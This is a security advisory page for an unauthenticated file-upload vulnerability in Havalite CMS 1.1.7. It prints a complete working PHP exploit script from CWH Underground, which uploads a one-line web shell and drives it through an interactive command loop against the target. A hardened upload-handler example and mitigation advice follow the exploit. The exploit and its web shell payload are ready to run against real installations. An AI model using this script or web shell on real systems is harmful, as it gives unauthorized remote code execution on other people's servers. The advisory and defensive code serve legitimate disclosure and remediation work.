Release date:
Updated on: 2013-07-13
Affected Systems:
Havalite CMS 1.1.7
Description:
--------------------------------------------------------------------------------
Havalite is a lightweight open-source CMS/blog program written in PHP and backed by SQLite.
The upload.php script requires no authentication and does not properly validate or filter the files a user uploads. An attacker can upload a file into a web-accessible path and then request it directly, causing the uploaded script to execute with the privileges of the web server.
<* Source: CWH Underground (www.citecclub.org)
Link: http://www.metasploit.com/modules/exploit/unix/webapp/havalite_upload_exec
http://www.osvdb.org/94405
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) may be offensive in nature and is intended only for security research and teaching. Use it at your own risk!
<?php
/*
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

Exploit Title: Havalite CMS Unrestricted File Upload Exploit
Date: 16 jun 2013
Exploit Author: CWH Underground
Site: www.2600.in.th
Vendor Homepage: http://havalite.com/
Software Link: http://jaist.dl.sourceforge.net/project/havalite/havalite_1.1.7.zip
Version: 1.1.7
Tested on: Windows and Linux

#####################################################
VULNERABILITY: Unrestricted File Upload
#####################################################

/havalite/upload.php

#####################################################
DESCRIPTION
#####################################################

Restricted access to this script isn't properly realized (doesn't require authentication),
so an attacker might be able to upload arbitrary files containing malicious PHP code due to uploaded file
extension isn't properly checked.

#####################################################
EXPLOIT
#####################################################
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

// Send a raw HTTP/1.0 request to port 80 and return the complete response.
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");

    fputs($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+-------------------------------------------------+";
print "\n| Havalite CMS Unrestricted File Upload Exploit   |";
print "\n+-------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /havalite/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];   // web path of the Havalite install, with trailing slash

// Multipart body with a single files[] field carrying a PHP stager (sh.php).
// The stager runs whatever command arrives base64-encoded in the Cmd request header.
$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"files[]\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print('___'); passthru(base64_decode(\$_SERVER['HTTP_CMD'])); ?>\r\n";
$payload .= "--o0oOo0o--\r\n";

// Unauthenticated POST to the upload handler; no session or token is needed.
$packet  = "POST {$path}havalite/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}havalite/hava_upload.php\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

http_send($host, $packet);

// The file keeps its client-supplied name and lands in the web-reachable tmp/files/ directory.
$packet  = "GET {$path}havalite/tmp/files/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

// Interactive loop: each command goes out base64-encoded in the Cmd header and
// the stager's output is everything after the ___ marker in the response body.
while (1)
{
    print "\nHavalite-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

?>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Havalite
--------
At present the vendor has not released a patch or upgrade. Users of this software are advised to follow the vendor's homepage for the latest version:
http://havalite.com/
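With no vendor fix available, the following is an added example of how an upload handler avoids the three conditions the exploit above depends on: it requires an authenticated session, stores files outside the document root under a server-chosen random name, and accepts only allowlisted extensions whose content matches. This is illustrative code written for this page, not Havalite's own code; the session key `admin`, the `$uploadDir` location and the allowlist are assumptions.

```php
<?php
// Added example, not code from Havalite: a hardened handler for the same
// files[] upload field. The session key 'admin', the upload directory and
// the allowlist below are assumptions made for illustration.
declare(strict_types=1);

session_start();

// (1) Authentication: the vulnerable upload.php accepted POSTs from anyone.
if (empty($_SESSION['admin'])) {
    http_response_code(401);
    exit('authentication required');
}

// (2) Storage outside the document root: nothing placed here can be fetched
//     with a GET and handed to the PHP interpreter. Files are later served to
//     users through a separate read-only download script (not shown).
$uploadDir = dirname($_SERVER['DOCUMENT_ROOT']) . '/uploads';   // assumption

// (3) Allowlist of extensions, each tied to the MIME type the bytes must have.
const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

/**
 * Validate one entry of $_FILES['files'] and return the extension to store it
 * under, or null when it must be rejected.
 */
function validateUpload(string $origName, string $tmpPath, int $error, finfo $finfo): ?string
{
    if ($error !== UPLOAD_ERR_OK || !is_uploaded_file($tmpPath)) {
        return null;
    }
    // Only the final extension counts and it is lower-cased: "sh.php" and
    // "SH.PHP" yield "php", which is not allowlisted; "sh.php.jpg" yields
    // "jpg" and must then also pass the content check below.
    $ext = strtolower(pathinfo($origName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return null;
    }
    // Sniff the actual bytes; the client-supplied Content-Type is untrusted.
    if ($finfo->file($tmpPath) !== ALLOWED[$ext]) {
        return null;
    }
    return $ext;
}

if (!isset($_FILES['files']['name']) || !is_array($_FILES['files']['name'])) {
    http_response_code(400);
    exit('no files');
}

$finfo  = new finfo(FILEINFO_MIME_TYPE);
$stored = [];

foreach ($_FILES['files']['name'] as $i => $origName) {
    $tmpPath = (string) $_FILES['files']['tmp_name'][$i];
    $ext = validateUpload((string) $origName, $tmpPath, (int) $_FILES['files']['error'][$i], $finfo);
    if ($ext === null) {
        continue;
    }
    // (4) Server-chosen random name: the attacker neither picks the extension
    //     nor can predict where the file ends up.
    $dest = $uploadDir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (move_uploaded_file($tmpPath, $dest)) {
        chmod($dest, 0640);   // readable by the server, never executable
        $stored[] = basename($dest);
    }
}

header('Content-Type: application/json');
echo json_encode(['stored' => $stored]);
```

Where the handler itself cannot be changed, configuring the web server to refuse PHP execution inside havalite/tmp/files/ blocks the second stage of the exploit (the GET to sh.php), but it does not close the missing authentication check on upload.php, so the directory still fills with attacker-chosen files.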